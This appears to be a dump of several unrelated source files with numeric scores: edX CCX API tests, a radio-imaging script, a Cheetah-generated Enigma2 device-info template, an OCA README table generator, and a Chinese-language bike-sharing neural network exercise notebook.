self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail(self, auth_attr):
"""
Test for successful patch
"""
outbox = self.get_outbox()
# create a new coach
new_coach = AdminFactory.create()
data = {
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': new_coach.email
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertEqual(ccx_from_db.max_student_enrollments_allowed, data['max_students_allowed'])
self.assertEqual(ccx_from_db.display_name, data['display_name'])
self.assertEqual(ccx_from_db.coach.email, data['coach_email'])
# check that the coach user has coach role on the master course
coach_role_on_master_course = CourseCcxCoachRole(self.master_course_key)
self.assertTrue(coach_role_on_master_course.has_user(new_coach))
# check that the coach has been enrolled in the ccx
ccx_course_object = courses.get_course_by_id(self.ccx_key)
self.assertTrue(
CourseEnrollment.objects.filter(course_id=ccx_course_object.id, user=new_coach).exists()
)
# check that an email has been sent to the coach
self.assertEqual(len(outbox), 1)
self.assertIn(new_coach.email, outbox[0].recipients()) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_modules(self, auth_attr):
"""
Specific test for successful patch of the course modules
"""
data = {'course_modules': self.master_course_chapters[0:1]}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, data['course_modules'])
data = {'course_modules': []}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, [])
data = {'course_modules': self.master_course_chapters}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, self.master_course_chapters)
data = {'course_modules': None}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertEqual(ccx_from_db.structure, None)
chapters = self.master_course_chapters[0:1]
data = {'course_modules': chapters * 3}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, chapters)
@ddt.data(
('auth', True),
('auth', False),
('auth_header_oauth2_provider', True),
('auth_header_oauth2_provider', False)
)
@ddt.unpack
def test_patch_user_on_active_state(self, auth_attr, user_is_active):
"""
Test patch ccx course on user's active state.
"""
self.app_user.is_active = user_is_active
self.app_user.save() # pylint: disable=no-member
chapters = self.master_course_chapters[0:1]
data = {'course_modules': chapters * 3}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
if not user_is_active:
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
else:
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, chapters)
@ddt.data(
('auth', True),
('auth', False),
('auth_header_oauth2_provider', True),
('auth_header_oauth2_provider', False)
)
@ddt.unpack
def test_delete_detail_on_active_state(self, auth_attr, user_is_active):
"""
Test for deleting a ccx course on user's active state.
"""
self.app_user.is_active = user_is_active
self.app_user.save() # pylint: disable=no-member
# check that there are overrides
self.assertGreater(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertGreater(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
resp = self.client.delete(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
if not user_is_active:
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
else:
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNone(resp.data) # pylint: disable=no-member
# the CCX does not exist any more
with self.assertRaises(CustomCourseForEdX.DoesNotExist):
CustomCourseForEdX.objects.get(id=self.ccx.id)
# check that there are no overrides
self.assertEqual(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertEqual(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
| 0.00286 |
#!/usr/bin/env python3
import sys
import numpy as np
from arthur.imaging import full_calculation, calculate_lag
from arthur.io import read_full
from arthur.plot import plot_image, plot_lag, plot_chan_power, plot_corr_mat, plot_diff
from arthur.constants import NUM_CHAN
from matplotlib import pyplot
FRQ = 58398437.5 # Central observation frequency in Hz
def main():
if len(sys.argv) < 2:
print("Image the first set of visibilites from a visibilities file")
print()
print("usage: {} <file>".format(sys.argv[0]))
sys.exit(1)
else:
path = sys.argv[1]
# define them here so we can access them out of for loop scope
lags = []
prev_data = date = img_data = corr_data = diff_data = None
chan_data = np.zeros((NUM_CHAN, 60), dtype=np.float32)
for date, body in read_full(path):
img_data, corr_data, chan_row = full_calculation(body, FRQ)
lags += [calculate_lag(date).seconds]
if prev_data is None:
prev_data = img_data
chan_data = np.roll(chan_data, 1)
chan_data[:, 0] = chan_row
diff_data = img_data - prev_data
prev_data = img_data
fig_img = plot_image(date, img_data, FRQ)
fig_lag = plot_lag(lags)
fig_chan = plot_chan_power(chan_data)
fig_cm = plot_corr_mat(corr_data, FRQ, date)
fig_diff = plot_diff(diff_data, FRQ, date)
pyplot.show()
if __name__ == '__main__':
main()
| 0.002083 |
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1364979192.551085
__CHEETAH_genTimestamp__ = 'Wed Apr 3 17:53:12 2013'
__CHEETAH_src__ = '/home/fermi/Work/Model/tmsingle/openpli3.0/build-tmsingle/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-0.1+git1+279a2577c3bc6defebd4bf9e61a046dcf7f37c01-r0.72/git/plugin/controllers/views/web/deviceinfo.tmpl'
__CHEETAH_srcLastModified__ = 'Wed Apr 3 17:10:17 2013'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %s. Templates compiled before version %s must be recompiled.'%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class deviceinfo(Template):
##################################################
## CHEETAH GENERATED METHODS
def __init__(self, *args, **KWs):
super(deviceinfo, self).__init__(*args, **KWs)
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
_orig_filter_63410281 = _filter
filterName = u'WebSafe'
if self._CHEETAH__filters.has_key("WebSafe"):
_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
else:
_filter = self._CHEETAH__currentFilter = \
self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
write(u'''<?xml version="1.0" encoding="UTF-8"?>
<e2deviceinfo>
\t<e2enigmaversion>''')
_v = VFFSL(SL,"enigmaver",True) # u'$enigmaver' on line 4, col 19
if _v is not None: write(_filter(_v, rawExpr=u'$enigmaver')) # from line 4, col 19.
write(u'''</e2enigmaversion>
\t<e2imageversion>''')
_v = VFFSL(SL,"imagever",True) # u'$imagever' on line 5, col 18
if _v is not None: write(_filter(_v, rawExpr=u'$imagever')) # from line 5, col 18.
write(u'''</e2imageversion>
\t<e2webifversion>''')
_v = VFFSL(SL,"webifver",True) # u'$webifver' on line 6, col 18
if _v is not None: write(_filter(_v, rawExpr=u'$webifver')) # from line 6, col 18.
write(u'''</e2webifversion>
\t<e2fpversion>''')
_v = VFFSL(SL,"str",False)(VFFSL(SL,"fp_version",True)) # u'$str($fp_version)' on line 7, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$str($fp_version)')) # from line 7, col 15.
write(u'''</e2fpversion>
\t<e2devicename>''')
_v = VFFSL(SL,"model",True) # u'$model' on line 8, col 16
if _v is not None: write(_filter(_v, rawExpr=u'$model')) # from line 8, col 16.
write(u'''</e2devicename>
\t<e2frontends>
''')
for tuner in VFFSL(SL,"tuners",True): # generated from line 10, col 3
write(u'''\t\t<e2frontend>
\t\t\t<e2name>''')
_v = VFFSL(SL,"tuner.name",True) # u'$tuner.name' on line 12, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$tuner.name')) # from line 12, col 12.
write(u'''</e2name>
\t\t\t<e2model>''')
_v = VFFSL(SL,"tuner.type",True) # u'$tuner.type' on line 13, col 13
if _v is not None: write(_filter(_v, rawExpr=u'$tuner.type')) # from line 13, col 13.
write(u'''</e2model>
\t\t</e2frontend>
''')
write(u'''\t</e2frontends>
\t<e2network>
''')
for iface in VFFSL(SL,"ifaces",True): # generated from line 18, col 3
write(u'''\t\t<e2interface>
\t\t\t<e2name>''')
_v = VFFSL(SL,"iface.name",True) # u'$iface.name' on line 20, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$iface.name')) # from line 20, col 12.
write(u'''</e2name>
\t\t\t<e2mac>''')
_v = VFFSL(SL,"iface.mac",True) # u'$iface.mac' on line 21, col 11
if _v is not None: write(_filter(_v, rawExpr=u'$iface.mac')) # from line 21, col 11.
write(u'''</e2mac>
\t\t\t<e2dhcp>''')
_v = VFFSL(SL,"iface.dhcp",True) # u'$iface.dhcp' on line 22, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$iface.dhcp')) # from line 22, col 12.
write(u'''</e2dhcp>
\t\t\t<e2ip>''')
_v = VFFSL(SL,"iface.ip",True) # u'$iface.ip' on line 23, col 10
if _v is not None: write(_filter(_v, rawExpr=u'$iface.ip')) # from line 23, col 10.
write(u'''</e2ip>
\t\t\t<e2gateway>''')
_v = VFFSL(SL,"iface.gw",True) # u'$iface.gw' on line 24, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$iface.gw')) # from line 24, col 15.
write(u'''</e2gateway>
\t\t\t<e2netmask>''')
_v = VFFSL(SL,"iface.mask",True) # u'$iface.mask' on line 25, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$iface.mask')) # from line 25, col 15.
write(u'''</e2netmask>
\t\t</e2interface>
''')
write(u'''\t</e2network>
\t<e2hdds>
''')
for hd in VFFSL(SL,"hdd",True): # generated from line 30, col 3
write(u'''\t\t<e2hdd>
\t\t\t<e2model>''')
_v = VFFSL(SL,"hd.model",True) # u'$hd.model' on line 32, col 13
if _v is not None: write(_filter(_v, rawExpr=u'$hd.model')) # from line 32, col 13.
write(u'''</e2model>
\t\t\t<e2capacity>''')
_v = VFFSL(SL,"hd.capacity",True) # u'$hd.capacity' on line 33, col 16
if _v is not None: write(_filter(_v, rawExpr=u'$hd.capacity')) # from line 33, col 16.
write(u'''</e2capacity>
\t\t\t<e2free>''')
_v = VFFSL(SL,"hd.free",True) # u'$hd.free' on line 34, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$hd.free')) # from line 34, col 12.
write(u'''</e2free>
\t\t</e2hdd>
''')
write(u'''\t</e2hdds>
</e2deviceinfo>
''')
_filter = self._CHEETAH__currentFilter = _orig_filter_63410281
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_deviceinfo= 'respond'
## END CLASS DEFINITION
if not hasattr(deviceinfo, '_initCheetahAttributes'):
templateAPIClass = getattr(deviceinfo, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(deviceinfo)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=deviceinfo()).run()
| 0.017738 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# License AGPLv3 (http://www.gnu.org/licenses/agpl-3.0-standalone.html)
"""
This script replaces markers in the README.md files
of an OCA repository with the list of addons present
in the repository. It preserves the marker so it
can be run again.
The script must be run from the root of the repository,
where the README.md file can be found.
Markers in README.md must have the form:
[//]: # (addons)
does not matter, will be replaced by the script
[//]: # (end addons)
"""
from __future__ import print_function
import ast
import io
import logging
import os
import re
import click
from .gitutils import commit_if_needed
_logger = logging.getLogger(__name__)
MARKERS = r'(\[//\]: # \(addons\))|(\[//\]: # \(end addons\))'
MANIFESTS = ('__openerp__.py', '__manifest__.py')
def sanitize_cell(s):
if not s:
return ''
s = ' '.join(s.split())
return s
def render_markdown_table(header, rows):
table = []
rows = [header, ['---'] * len(header)] + rows
for row in rows:
table.append(' | '.join(row))
return '\n'.join(table)
def replace_in_readme(readme_path, header, rows_available, rows_unported):
with io.open(readme_path, encoding='utf8') as f:
readme = f.read()
parts = re.split(MARKERS, readme, flags=re.MULTILINE)
if len(parts) != 7:
_logger.warning('Addons markers not found or incorrect in %s',
readme_path)
return
addons = []
if rows_available:
addons.extend([
'\n',
'\n',
'Available addons\n',
'----------------\n',
render_markdown_table(header, rows_available),
'\n'
])
if rows_unported:
addons.extend([
'\n',
'\n',
'Unported addons\n',
'---------------\n',
render_markdown_table(header, rows_unported),
'\n'
])
addons.append('\n')
parts[2:5] = addons
readme = ''.join(parts)
with io.open(readme_path, 'w', encoding='utf8') as f:
f.write(readme)
@click.command()
@click.option('--commit/--no-commit',
help="git commit changes to README.rst, if any.")
def gen_addons_table(commit):
readme_path = 'README.md'
if not os.path.isfile(readme_path):
_logger.warning('%s not found', readme_path)
return
# list addons in . and __unported__
addon_paths = [] # list of (addon_path, unported)
for addon_path in os.listdir('.'):
addon_paths.append((addon_path, False))
unported_directory = '__unported__'
if os.path.isdir(unported_directory):
for addon_path in os.listdir(unported_directory):
addon_path = os.path.join(unported_directory, addon_path)
addon_paths.append((addon_path, True))
addon_paths = sorted(addon_paths, key=lambda x: x[0])
# load manifests
header = ('addon', 'version', 'summary')
rows_available = []
rows_unported = []
for addon_path, unported in addon_paths:
for manifest_file in MANIFESTS:
manifest_path = os.path.join(addon_path, manifest_file)
has_manifest = os.path.isfile(manifest_path)
if has_manifest:
break
if has_manifest:
with open(manifest_path) as f:
manifest = ast.literal_eval(f.read())
addon_name = os.path.basename(addon_path)
link = '[%s](%s/)' % (addon_name, addon_path)
version = manifest.get('version') or ''
summary = manifest.get('summary') or manifest.get('name')
summary = sanitize_cell(summary)
installable = manifest.get('installable', True)
if unported and installable:
_logger.warning('%s is in __unported__ but is marked '
'installable.' % addon_path)
installable = False
if installable:
rows_available.append((link, version, summary))
else:
rows_unported.append((link, version + ' (unported)', summary))
# replace table in README.md
replace_in_readme(readme_path, header, rows_available, rows_unported)
if commit:
commit_if_needed(
[readme_path],
'[UPD] addons table in README.md',
)
if __name__ == '__main__':
gen_addons_table()
| 0 |
# coding: utf-8
# # 你的第一个神经网络
#
# 在此项目中,你将构建你的第一个神经网络,并用该网络预测每日自行车租客人数。我们提供了一些代码,但是需要你来实现神经网络(大部分内容)。提交此项目后,欢迎进一步探索该数据和模型。
# In[1]:
get_ipython().magic('matplotlib inline')
get_ipython().magic("config InlineBackend.figure_format = 'retina'")
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# ## 加载和准备数据
#
# 构建神经网络的关键一步是正确地准备数据。不同尺度级别的变量使网络难以高效地掌握正确的权重。我们在下方已经提供了加载和准备数据的代码。你很快将进一步学习这些代码!
# In[3]:
data_path = 'Bike-Sharing-Dataset/hour.csv'
rides = pd.read_csv(data_path)
# In[4]:
rides.head()
# ## 数据简介
#
# 此数据集包含的是从 2011 年 1 月 1 日到 2012 年 12 月 31 日期间每天每小时的骑车人数。骑车用户分成临时用户和注册用户,cnt 列是骑车用户数汇总列。你可以在上方看到前几行数据。
#
# 下图展示的是数据集中前 10 天左右的骑车人数(某些天不一定是 24 个条目,所以不是精确的 10 天)。你可以在这里看到每小时租金。这些数据很复杂!周末的骑行人数少些,工作日上下班期间是骑行高峰期。我们还可以从上方的数据中看到温度、湿度和风速信息,所有这些信息都会影响骑行人数。你需要用你的模型展示所有这些数据。
# In[5]:
rides[:24*10].plot(x='dteday', y='cnt')
# ### 虚拟变量(哑变量)
#
# 下面是一些分类变量,例如季节、天气、月份。要在我们的模型中包含这些数据,我们需要创建二进制虚拟变量。用 Pandas 库中的 `get_dummies()` 就可以轻松实现。
# In[6]:
dummy_fields = ['season', 'weathersit', 'mnth', 'hr', 'weekday']
for each in dummy_fields:
dummies = pd.get_dummies(rides[each], prefix=each, drop_first=False)
rides = pd.concat([rides, dummies], axis=1)
fields_to_drop = ['instant', 'dteday', 'season', 'weathersit',
'weekday', 'atemp', 'mnth', 'workingday', 'hr']
data = rides.drop(fields_to_drop, axis=1)
data.head()
# ### 调整目标变量
#
# 为了更轻松地训练网络,我们将对每个连续变量标准化,即转换和调整变量,使它们的均值为 0,标准差为 1。
#
# 我们会保存换算因子,以便当我们使用网络进行预测时可以还原数据。
# In[7]:
quant_features = ['casual', 'registered', 'cnt', 'temp', 'hum', 'windspeed']
# Store scalings in a dictionary so we can convert back later
scaled_features = {}
for each in quant_features:
mean, std = data[each].mean(), data[each].std()
scaled_features[each] = [mean, std]
data.loc[:, each] = (data[each] - mean)/std
# ### 将数据拆分为训练、测试和验证数据集
#
# 我们将大约最后 21 天的数据保存为测试数据集,这些数据集会在训练完网络后使用。我们将使用该数据集进行预测,并与实际的骑行人数进行对比。
# In[8]:
# Save data for approximately the last 21 days
test_data = data[-21*24:]
# Now remove the test data from the data set
data = data[:-21*24]
# Separate the data into features and targets
target_fields = ['cnt', 'casual', 'registered']
features, targets = data.drop(target_fields, axis=1), data[target_fields]
test_features, test_targets = test_data.drop(target_fields, axis=1), test_data[target_fields]
# 我们将数据拆分为两个数据集,一个用作训练,一个在网络训练完后用来验证网络。因为数据是有时间序列特性的,所以我们用历史数据进行训练,然后尝试预测未来数据(验证数据集)。
# In[9]:
# Hold out the last 60 days or so of the remaining data as a validation set
train_features, train_targets = features[:-60*24], targets[:-60*24]
val_features, val_targets = features[-60*24:], targets[-60*24:]
# ## 开始构建网络
#
# 下面你将构建自己的网络。我们已经构建好结构和反向传递部分。你将实现网络的前向传递部分。还需要设置超参数:学习速率、隐藏单元的数量,以及训练传递数量。
#
# <img src="assets/neural_network.png" width=300px>
#
# 该网络有两个层级,一个隐藏层和一个输出层。隐藏层级将使用 S 型函数作为激活函数。输出层只有一个节点,用于递归,节点的输出和节点的输入相同。即激活函数是 $f(x)=x$。这种函数获得输入信号,并生成输出信号,但是会考虑阈值,称为激活函数。我们完成网络的每个层级,并计算每个神经元的输出。一个层级的所有输出变成下一层级神经元的输入。这一流程叫做前向传播(forward propagation)。
#
# 我们在神经网络中使用权重将信号从输入层传播到输出层。我们还使用权重将错误从输出层传播回网络,以便更新权重。这叫做反向传播(backpropagation)。
#
# > **提示**:你需要为反向传播实现计算输出激活函数 ($f(x) = x$) 的导数。如果你不熟悉微积分,其实该函数就等同于等式 $y = x$。该等式的斜率是多少?也就是导数 $f(x)$。
#
#
# 你需要完成以下任务:
#
# 1. 实现 S 型激活函数。将 `__init__` 中的 `self.activation_function` 设为你的 S 型函数。
# 2. 在 `train` 方法中实现前向传递。
# 3. 在 `train` 方法中实现反向传播算法,包括计算输出错误。
# 4. 在 `run` 方法中实现前向传递。
#
#
# In[26]:
class NeuralNetwork(object):
def __init__(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_input_to_hidden = np.random.normal(0.0, self.input_nodes**-0.5,
(self.input_nodes, self.hidden_nodes))
self.weights_hidden_to_output = np.random.normal(0.0, self.hidden_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.lr = learning_rate
#### TODO: Set self.activation_function to your implemented sigmoid function ####
#
# Note: in Python, you can define a function with a lambda expression,
# as shown below.
self.activation_function = lambda x : 1 / (1 + np.exp(-x)) # Replace 0 with your sigmoid calculation.
self.sigmoid_prime = lambda fx : fx * (1 - fx)
### If the lambda code above is not something you're familiar with,
# You can uncomment out the following three lines and put your
# implementation there instead.
#
#def sigmoid(x):
# return 0 # Replace 0 with your sigmoid calculation here
#self.activation_function = sigmoid
def train(self, features, targets):
''' Train the network on batch of features and targets.
Arguments
---------
features: 2D array, each row is one data record, each column is a feature
targets: 1D array of target values
'''
n_records = features.shape[0]
delta_weights_i_h = np.zeros(self.weights_input_to_hidden.shape)
delta_weights_h_o = np.zeros(self.weights_hidden_to_output.shape)
for X, y in zip(features, targets):
#### Implement the forward pass here ####
### Forward pass ###
# TODO: Hidden layer - Replace these values with your calculations.
hidden_inputs = np.dot(X, self.weights_input_to_hidden) # signals into hidden layer
hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer
# TODO: Output layer - Replace these values with your calculations.
final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer
final_outputs = final_inputs # signals from final output layer
#### Implement the backward pass here ####
### Backward pass ###
# TODO: Output error - Replace this value with your calculations.
error = y - final_outputs # Output layer error is the difference between desired target and actual output.
output_error_term = error * 1
# TODO: Calculate the hidden layer's contribution to the error
hidden_error = output_error_term * self.weights_hidden_to_output.T
# TODO: Backpropagated error terms - Replace these values with your calculations.
hidden_error_term = hidden_error * self.sigmoid_prime(hidden_outputs)
# Weight step (input to hidden)
delta_weights_i_h += hidden_error_term * X[:, None]
# Weight step (hidden to output)
delta_weights_h_o += output_error_term * hidden_outputs[:, None]
# TODO: Update the weights - Replace these values with your calculations.
self.weights_hidden_to_output += self.lr * delta_weights_h_o / n_records # update hidden-to-output weights with gradient descent step
self.weights_input_to_hidden += self.lr * delta_weights_i_h / n_records # update input-to-hidden weights with gradient descent step
def run(self, features):
''' Run a forward pass through the network with input features
Arguments
---------
features: 1D array of feature values
'''
#### Implement the forward pass here ####
# TODO: Hidden layer - replace these values with the appropriate calculations.
hidden_inputs = np.dot(features, self.weights_input_to_hidden) # signals into hidden layer
hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer
# TODO: Output layer - Replace these values with the appropriate calculations.
final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer
final_outputs = final_inputs # signals from final output layer
return final_outputs
# In[28]:
def MSE(y, Y):
return np.mean((y-Y)**2)
# ## 单元测试
#
# 运行这些单元测试,检查你的网络实现是否正确。这样可以帮助你确保网络已正确实现,然后再开始训练网络。这些测试必须成功才能通过此项目。
# In[31]:
import unittest
inputs = np.array([[0.5, -0.2, 0.1]])
targets = np.array([[0.4]])
test_w_i_h = np.array([[0.1, -0.2],
[0.4, 0.5],
[-0.3, 0.2]])
test_w_h_o = np.array([[0.3],
[-0.1]])
class TestMethods(unittest.TestCase):
##########
# Unit tests for data loading
##########
def test_data_path(self):
# Test that file path to dataset has been unaltered
self.assertTrue(data_path.lower() == 'bike-sharing-dataset/hour.csv')
def test_data_loaded(self):
# Test that data frame loaded
self.assertTrue(isinstance(rides, pd.DataFrame))
##########
# Unit tests for network functionality
##########
def test_activation(self):
network = NeuralNetwork(3, 2, 1, 0.5)
# Test that the activation function is a sigmoid
self.assertTrue(np.all(network.activation_function(0.5) == 1/(1+np.exp(-0.5))))
def test_train(self):
# Test that weights are updated correctly on training
network = NeuralNetwork(3, 2, 1, 0.5)
network.weights_input_to_hidden = test_w_i_h.copy()
network.weights_hidden_to_output = test_w_h_o.copy()
network.train(inputs, targets)
self.assertTrue(np.allclose(network.weights_hidden_to_output,
np.array([[ 0.37275328],
[-0.03172939]])))
self.assertTrue(np.allclose(network.weights_input_to_hidden,
np.array([[ 0.10562014, -0.20185996],
[0.39775194, 0.50074398],
[-0.29887597, 0.19962801]])))
def test_run(self):
# Test correctness of run method
network = NeuralNetwork(3, 2, 1, 0.5)
network.weights_input_to_hidden = test_w_i_h.copy()
network.weights_hidden_to_output = test_w_h_o.copy()
self.assertTrue(np.allclose(network.run(inputs), 0.09998924))
suite = unittest.TestLoader().loadTestsFromModule(TestMethods())
unittest.TextTestRunner().run(suite)
# ## 训练网络
#
# 现在你将设置网络的超参数。策略是设置的超参数使训练集上的错误很小但是数据不会过拟合。如果网络训练时间太长,或者有太多的隐藏节点,可能就会过于针对特定训练集,无法泛化到验证数据集。即当训练集的损失降低时,验证集的损失将开始增大。
#
# 你还将采用随机梯度下降 (SGD) 方法训练网络。对于每次训练,都获取随机样本数据,而不是整个数据集。与普通梯度下降相比,训练次数要更多,但是每次时间更短。这样的话,网络训练效率更高。稍后你将详细了解 SGD。
#
#
# ### 选择迭代次数
#
# 也就是训练网络时从训练数据中抽样的批次数量。迭代次数越多,模型就与数据越拟合。但是,如果迭代次数太多,模型就无法很好地泛化到其他数据,这叫做过拟合。你需要选择一个使训练损失很低并且验证损失保持中等水平的数字。当你开始过拟合时,你会发现训练损失继续下降,但是验证损失开始上升。
#
# ### 选择学习速率
#
# 速率可以调整权重更新幅度。如果速率太大,权重就会太大,导致网络无法与数据相拟合。建议从 0.1 开始。如果网络在与数据拟合时遇到问题,尝试降低学习速率。注意,学习速率越低,权重更新的步长就越小,神经网络收敛的时间就越长。
#
#
# ### 选择隐藏节点数量
#
# 隐藏节点越多,模型的预测结果就越准确。尝试不同的隐藏节点的数量,看看对性能有何影响。你可以查看损失字典,寻找网络性能指标。如果隐藏单元的数量太少,那么模型就没有足够的空间进行学习,如果太多,则学习方向就有太多的选择。选择隐藏单元数量的技巧在于找到合适的平衡点。
# In[59]:
import sys
### Set the hyperparameters here ###
iterations = 4000
learning_rate = 0.3
hidden_nodes = 4
output_nodes = 1
N_i = train_features.shape[1]
network = NeuralNetwork(N_i, hidden_nodes, output_nodes, learning_rate)
losses = {'train':[], 'validation':[]}
for ii in range(iterations):
# Go through a random batch of 128 records from the training data set
batch = np.random.choice(train_features.index, size=128)
X, y = train_features.ix[batch].values, train_targets.ix[batch]['cnt']
network.train(X, y)
# Printing out the training progress
train_loss = MSE(network.run(train_features).T, train_targets['cnt'].values)
val_loss = MSE(network.run(val_features).T, val_targets['cnt'].values)
sys.stdout.write("\rProgress: {:2.1f}".format(100 * ii/float(iterations)) + "% ... Training loss: " + str(train_loss)[:5] + " ... Validation loss: " + str(val_loss)[:5])
sys.stdout.flush()
losses['train'].append(train_loss)
losses['validation'].append(val_loss)
# In[60]:
plt.plot(losses['train'], label='Training loss')
plt.plot(losses['validation'], label='Validation loss')
plt.legend()
_ = plt.ylim()
# ## 检查预测结果
#
# 使用测试数据看看网络对数据建模的效果如何。如果完全错了,请确保网络中的每步都正确实现。
# In[61]:
fig, ax = plt.subplots(figsize=(8,4))
mean, std = scaled_features['cnt']
predictions = network.run(test_features).T*std + mean
ax.plot(predictions[0], label='Prediction')
ax.plot((test_targets['cnt']*std + mean).values, label='Data')
ax.set_xlim(right=len(predictions))
ax.legend()
dates = pd.to_datetime(rides.ix[test_data.index]['dteday'])
dates = dates.apply(lambda d: d.strftime('%b %d'))
ax.set_xticks(np.arange(len(dates))[12::24])
_ = ax.set_xticklabels(dates[12::24], rotation=45)
# ## 可选:思考下你的结果(我们不会评估这道题的答案)
#
#
# 请针对你的结果回答以下问题。模型对数据的预测效果如何?哪里出现问题了?为何出现问题呢?
#
# > **注意**:你可以通过双击该单元编辑文本。如果想要预览文本,请按 Control + Enter
#
# #### 请将你的答案填写在下方
#
| 0.010676 |
# -*- coding: utf-8 -*-
##############################################################################
#
